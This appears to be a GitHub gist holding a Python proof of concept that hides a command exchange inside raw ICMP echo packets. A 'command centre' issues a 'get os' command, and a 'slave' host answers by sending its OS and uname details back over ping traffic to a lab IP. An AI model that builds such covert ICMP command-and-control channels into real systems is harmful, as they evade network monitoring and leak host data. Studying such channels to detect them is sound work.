Created
August 5, 2019 15:27
-
-
Save efaisal/d3e2820d8e4a6975c4e9c55abee28412 to your computer and use it in GitHub Desktop.
POC using ICMP to exchange info
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import random | |
import socket | |
import select | |
import struct | |
import time | |
import platform | |
def checksum(frame): | |
s = 0 | |
for i in range(0, len(frame), 2): | |
w = frame[i] + (frame[i+1] << 8) | |
s = ((s + w) & 0xffff) + ((s + w) >> 16) | |
return ~s & 0xffff | |
def icmp_echo(hdr_id=None, seq=1, embed='', mtu=228): | |
hdr_type, hdr_code, hdr_chksum = 8, 0, 0 | |
if not hdr_id: | |
hdr_id = random.randint(1, 65535) | |
hdr_seq = seq | |
if type(embed) is str: | |
embed = bytes(embed, 'utf8') | |
elif type(embed) is bytes: | |
pass | |
else: | |
raise TypeError('Unsupported type for `embed`') | |
allowed_len = mtu - 28 | |
if len(embed) > allowed_len: | |
raise Exception('Payload to large for specified MTU') | |
pad = b'\x00' * (allowed_len - len(embed)) | |
hdr = struct.pack('bbHHh', hdr_type, hdr_code, hdr_chksum, hdr_id, hdr_seq) | |
chksum = struct.pack('H', checksum(hdr + embed + pad)) | |
# Payload | |
return hdr_id, hdr[:2] + chksum + hdr[4:] + embed + pad | |
def icmp_echo_reply_parser(frame_id=None, seq=None, frame=None): | |
hdr_type, hdr_code, hdr_chksum, hdr_id, hdr_seq = struct.unpack('bbHHh', frame[:8]) | |
if hdr_type != 8 and hdr_id == frame_id and hdr_seq == seq: | |
return frame[8:].rstrip(b'\x00').decode('utf') | |
def icmp_echo_parser(frame_id=None, seq=None, frame=None): | |
hdr_type, hdr_code, hdr_chksum, hdr_id, hdr_seq = struct.unpack('bbHHh', frame[:8]) | |
if hdr_type == 8 and hdr_id == frame_id and hdr_seq == seq: | |
return frame[8:].rstrip(b'\x00').decode('utf') | |
elif hdr_type == 8 and frame_id is None and seq is None: | |
return hdr_id, hdr_seq, frame[8:].rstrip(b'\x00').decode('utf') | |
def icmp_echo_reply(hdr_id, seq, embed='', mtu=228): | |
hdr_type, hdr_code, hdr_chksum = 0, 0, 0 | |
hdr_seq = seq | |
if type(embed) is str: | |
embed = bytes(embed, 'utf8') | |
elif type(embed) is bytes: | |
pass | |
else: | |
raise TypeError('Unsupported type for `embed`') | |
allowed_len = mtu - 28 | |
if len(embed) > allowed_len: | |
raise Exception('Payload to large for specified MTU') | |
pad = b'\x00' * (allowed_len - len(embed)) | |
hdr = struct.pack('bbHHh', hdr_type, hdr_code, hdr_chksum, hdr_id, hdr_seq) | |
chksum = struct.pack('H', checksum(hdr + embed + pad)) | |
# Payload | |
return hdr_id, hdr[:2] + chksum + hdr[4:] + embed + pad | |
def slave(dest, embed, mtu=228, timeout=2): | |
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 1) | |
has_timeout = False | |
unknown_cmd = False | |
reply_payload = [] | |
seq = 1 | |
packet_id = None | |
for l in embed: | |
cmd, resp = l | |
packet_id, payload = icmp_echo(packet_id, seq, cmd, mtu) | |
sock.sendto(payload, (dest, 1)) | |
while True: | |
ready = select.select([sock], [], [], timeout) | |
if ready[0] == []: # timeout | |
has_timeout = True | |
break | |
recv, addr = ready[0][0].recvfrom(1024) | |
parsed_resp = icmp_echo_reply_parser(packet_id, seq, recv[20:]) | |
if parsed_resp == cmd: | |
continue | |
if parsed_resp != resp: | |
unknown_cmd = True | |
reply_payload.append(parsed_resp) | |
break | |
if has_timeout or unknown_cmd: | |
break | |
seq = seq + 1 | |
if reply_payload[-1] == 'get os': | |
cmd = list(platform.linux_distribution()) | |
cmd.extend(list(platform.uname())) | |
cmd = str(cmd) | |
packet_id, payload = icmp_echo(packet_id, seq, cmd, mtu) | |
sock.sendto(payload, (dest, 1)) | |
while True: | |
ready = select.select([sock], [], [], timeout) | |
if ready[0] == []: # timeout | |
has_timeout = True | |
break | |
recv, addr = sock.recvfrom(1024) | |
parsed_resp = icmp_echo_reply_parser(packet_id, seq, recv[20:]) | |
reply_payload.append(parsed_resp) | |
break | |
sock.close() | |
return reply_payload | |
def command_centre(rules, mtu=228, timeout=2): | |
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 1) | |
packet_id, seq, quit = None, None, False | |
while True: | |
ready = select.select([sock], [], []) | |
if ready[0]: | |
recv, addr = sock.recvfrom(65535) | |
parsed_req = icmp_echo_parser(packet_id, seq, recv[20:]) | |
if not parsed_req: | |
continue | |
if type(parsed_req) is tuple: | |
packet_id, seq, parsed_req = parsed_req | |
if quit: | |
break | |
if parsed_req in rules: | |
packet_id, payload = icmp_echo_reply( | |
packet_id, seq, rules[parsed_req], mtu | |
) | |
sock.sendto(payload, addr) | |
seq = seq + 1 | |
if rules[parsed_req] == 'get os': | |
quit = True | |
if __name__ == '__main__': | |
# Command Centre | |
#rules = { | |
# 'helo master': 'helo slave', | |
# 'ur cmd': 'get os' | |
#} | |
#cc = command_centre(rules) | |
#print('Slave report :: OS info') | |
#print(cc) | |
# Slave | |
rules = ( | |
('helo master', 'helo slave'), | |
('ur cmd', 'get os') | |
) | |
s = slave('192.168.122.99', rules) | |
print('Master greet:') | |
for i in s[:-1]: | |
print(i) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment